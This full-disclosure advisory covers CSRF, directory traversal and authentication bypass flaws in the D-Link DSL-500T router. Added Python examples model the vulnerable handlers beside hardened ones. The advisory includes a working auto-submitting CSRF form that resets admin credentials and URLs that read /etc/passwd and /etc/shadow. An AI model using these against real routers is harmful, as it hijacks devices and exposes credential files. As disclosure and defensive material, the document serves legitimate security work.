Date: Tue, 20 Dec 2011 01:28:21 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: CSRF, DT and AB vulnerabilities in D-Link DSL-500T ADSL Router

Hello list!

I want to warn you about new security vulnerabilities in the D-Link DSL-500T 
ADSL Router.

These are Cross-Site Request Forgery, Directory Traversal and Authentication 
Bypass vulnerabilities. This is my fifth advisory (#3 and #4 were announced 
and will be disclosed later, after giving D-Link time to fix those 
vulnerabilities) in a series of advisories about vulnerabilities in D-Link 
products.

-------------------------
Affected products:
-------------------------

The following model is vulnerable: D-Link DSL-500T, firmware 
V1.00B02T02.RU.20050223. Other firmware versions of this model are also 
vulnerable, and other D-Link router models may be vulnerable as well.

----------
Details:
----------

CSRF (WASC-09):

Every function of the router's admin panel is vulnerable to CSRF: the forms 
carry no anti-CSRF token, so a page on any other site can submit them while 
the administrator's browser attaches the router session. For example, the 
following CSRF request changes the administrator's login and password.

D-Link DSL-500T CSRF.html

<html>
<head>
<title>D-Link DSL-500T CSRF exploit (C) 2011 MustLive. 
http://websecurity.com.ua</title>
</head>
<!-- the form is submitted as soon as the page loads; the victim's browser
     attaches the router session it already holds -->
<body onLoad="document.hack.submit()">
<form name="hack" action="http://192.168.1.1/cgi-bin/webcm" method="post" 
enctype="application/x-www-form-urlencoded">
<!-- getpage selects the user-management page handler inside webcm -->
<input type="hidden" name="getpage" value="../html/tools/usrmgmt.htm">
<!-- new administrator credentials; password and confirmation must match -->
<input type="hidden" name="security:settings/username" value="admin">
<input type="hidden" name="security:settings/password" value="password">
<input type="hidden" name="security:settings/password_confirm" 
value="password">
<input type="hidden" name="security:settings/idle_timeout" value="30">
</form>
</body>
</html>

All other functions of the admin panel are vulnerable to CSRF in the same 
way. Combined with an XSS and the Directory Traversal below, this makes it 
possible to read arbitrary files from the router remotely.
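The handler-side view of the CSRF above, as an added example that is not part of the advisory or of D-Link's webcm code: a small Python model of the usrmgmt.htm handler in its vulnerable form (any authenticated POST is honoured) beside a hardened form that checks the request's Origin (or Referer) against the router's own origin and requires a per-session anti-CSRF token. The Request and Session classes, ROUTER_ORIGIN, the csrf_token field and the attacker origin are assumptions for the demo; the form field names and values are those of the exploit form.

```python
"""
Model of the DSL-500T usrmgmt.htm handler: the vulnerable form (accepts any
authenticated POST) next to a hardened form (same-origin check plus a
per-session anti-CSRF token). Request/Session are constructed for the demo;
the real webcm CGI does not expose these names.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"   # origin of the admin panel (assumed)


@dataclass
class Session:
    """Admin session state; csrf_token is generated once per session."""
    username: str = "admin"
    password: str = "admin"
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


@dataclass
class Request:
    """Minimal HTTP POST as webcm would see it (constructed, not real)."""
    body: str          # application/x-www-form-urlencoded
    headers: dict      # e.g. {"Origin": ...} or {"Referer": ...}
    session: Session   # the browser attached the admin's cookie/credentials


def parse_form(body):
    """Flatten the url-encoded body into a {name: value} dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def usrmgmt_vulnerable(req):
    """What the advisory describes: any authenticated POST changes credentials."""
    form = parse_form(req.body)
    if form.get("security:settings/password") != form.get("security:settings/password_confirm"):
        return "error: passwords differ"
    req.session.username = form["security:settings/username"]
    req.session.password = form["security:settings/password"]
    return "ok"


def request_origin(req):
    """Origin header if present, otherwise scheme+host of the Referer, else None."""
    if "Origin" in req.headers:
        return req.headers["Origin"]
    ref = req.headers.get("Referer")
    if ref:
        parts = urlsplit(ref)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def usrmgmt_hardened(req):
    """Same handler with two independent CSRF defences."""
    # 1. A cross-site form post carries the attacker's Origin (or none at all);
    #    only requests from the panel's own origin are accepted.
    if request_origin(req) != ROUTER_ORIGIN:
        return "rejected: cross-site origin"
    # 2. The form must carry the secret token bound to this session; a page on
    #    another origin cannot read it, so it cannot forge a valid post.
    token = parse_form(req.body).get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), req.session.csrf_token.encode()):
        return "rejected: bad csrf token"
    return usrmgmt_vulnerable(req)


# Body the advisory's auto-submitting form sends (field names taken from it)
EXPLOIT_BODY = ("getpage=../html/tools/usrmgmt.htm"
                "&security:settings/username=admin"
                "&security:settings/password=password"
                "&security:settings/password_confirm=password"
                "&security:settings/idle_timeout=30")


def run_demo():
    """Exercise both handlers; returns (result, resulting password) per case."""
    evil = {"Origin": "http://evil.example"}   # attacker page's origin (constructed)

    victim = Session()
    vuln = usrmgmt_vulnerable(Request(EXPLOIT_BODY, evil, victim))

    victim2 = Session()
    hard_attack = usrmgmt_hardened(Request(EXPLOIT_BODY, evil, victim2))

    admin = Session()   # the real admin submits the panel's own form, token included
    legit_body = EXPLOIT_BODY + "&csrf_token=" + admin.csrf_token
    hard_legit = usrmgmt_hardened(Request(legit_body, {"Origin": ROUTER_ORIGIN}, admin))

    return {
        "vulnerable": (vuln, victim.password),
        "hardened_attack": (hard_attack, victim2.password),
        "hardened_legit": (hard_legit, admin.password),
    }


if __name__ == "__main__":
    for case, outcome in run_demo().items():
        print(f"{case:16s} -> {outcome}")
```

The Origin check alone is not enough on its own (old browsers omit the header, and a Referer can be suppressed), which is why the token check is kept as the second, independent gate; either one would have stopped the form above.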

Directory Traversal (WASC-33):

In 2006 a DT vulnerability was found in other models of D-Link routers 
(CVE-2006-2337). It also exists in this model, as I've checked (but unlike 
the description of the DT in other models, in my model authentication is 
required).

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/passwd
http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Through the getpage parameter it is possible to read arbitrary files from the 
router, but this vulnerability only works after authentication.
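The getpage lookup behind the two URLs above, as an added example that is not the advisory's or D-Link's code: a Python model of how an unconfined page lookup serves /etc/passwd and ../ paths, beside a confined lookup that rejects absolute paths, normalises the request and verifies (lexically and after symlink resolution) that the result stays under the web root. The lookups run inside a throw-away "device" tree built in a temporary directory, so the /etc/passwd and /etc/shadow contents are constructed samples, not host files. The directory names (/usr/www/cgi-bin, /usr/www/html) and all function names are assumptions for the demo; the getpage values are the advisory's.

```python
"""
Model of webcm's getpage= lookup: the traversal the advisory reports next to a
confined lookup. Paths resolve inside a fake device tree in a temp directory.
"""
import os
import tempfile

# Assumed on-device layout: CGI dir next to the HTML tree, both under /usr/www
CGI_DIR = "/usr/www/cgi-bin"
WEB_ROOT = "/usr/www/html"


def build_device_tree():
    """Construct a fake device filesystem; returns its host-side root."""
    root = tempfile.mkdtemp(prefix="dsl500t_")
    files = {   # constructed sample contents, not real router files
        "usr/www/html/tools/usrmgmt.htm": "<html>user management</html>\n",
        "etc/passwd": "root:x:0:0:root:/root:/bin/sh\n",
        "etc/shadow": "root:$1$constructedhash:15000:0:99999:7:::\n",
    }
    for rel, content in files.items():
        host = os.path.join(root, rel)
        os.makedirs(os.path.dirname(host), exist_ok=True)
        with open(host, "w") as fh:
            fh.write(content)
    return root


def host_path(device_root, device_path):
    """Map a device-absolute path onto the fake tree."""
    return os.path.join(device_root, device_path.lstrip("/"))


def getpage_vulnerable(device_root, getpage):
    """Unconfined lookup: join and read, no check.
    os.path.join discards CGI_DIR when getpage is absolute, and normpath walks
    '..' out of the tree, so /etc/passwd and ../html/... both resolve."""
    target = os.path.normpath(os.path.join(CGI_DIR, getpage))
    with open(host_path(device_root, target)) as fh:
        return fh.read()


def getpage_confined(device_root, getpage):
    """Hardened lookup: reject absolute/malformed paths, normalise, then verify
    the result is inside WEB_ROOT, lexically and after symlink resolution."""
    if os.path.isabs(getpage) or "\\" in getpage or "\0" in getpage:
        raise PermissionError("absolute or malformed page path")
    target = os.path.normpath(os.path.join(WEB_ROOT, getpage))
    if os.path.commonpath([WEB_ROOT, target]) != WEB_ROOT:
        raise PermissionError("page path escapes web root")
    real_root = os.path.realpath(host_path(device_root, WEB_ROOT))
    real_target = os.path.realpath(host_path(device_root, target))
    if os.path.commonpath([real_root, real_target]) != real_root:
        raise PermissionError("symlink escapes web root")
    with open(real_target) as fh:
        return fh.read()


def probe(device_root, getpage):
    """Return {'vulnerable': (...), 'confined': (...)} with ('served', data)
    or ('blocked', reason) for the same getpage value."""
    out = {}
    for name, fn in (("vulnerable", getpage_vulnerable), ("confined", getpage_confined)):
        try:
            out[name] = ("served", fn(device_root, getpage))
        except (PermissionError, FileNotFoundError) as exc:
            out[name] = ("blocked", str(exc))
    return out


if __name__ == "__main__":
    root = build_device_tree()
    for page in ("/etc/passwd", "/etc/shadow", "../../../etc/shadow",
                 "../html/tools/usrmgmt.htm"):
        print(page, "->", probe(root, page))
```

Note that the legitimate value from the CSRF form, ../html/tools/usrmgmt.htm, still lands inside the web root after normalisation and is served by the confined lookup, while /etc/passwd and the ../../../ variant are refused before any file is opened; the lexical commonpath check is what blocks traversal, and the realpath check is the extra guard against a symlink planted under the web root.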

Authentication Bypass (WASC-01):

In 2005 an AB vulnerability was found in other models of D-Link routers 
(CVE-2005-1680). It also exists in this model, as I've checked.

Commands can be sent to the firmwarecfg application without authentication. 
This allows, for example, retrieving the configuration file, which contains 
the administrator's login and password, and thus gaining access to the admin 
panel.

------------
Timeline:
------------

2011.12.17 - disclosed at my site.

I mentioned these vulnerabilities at my site 
(http://websecurity.com.ua/5581/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
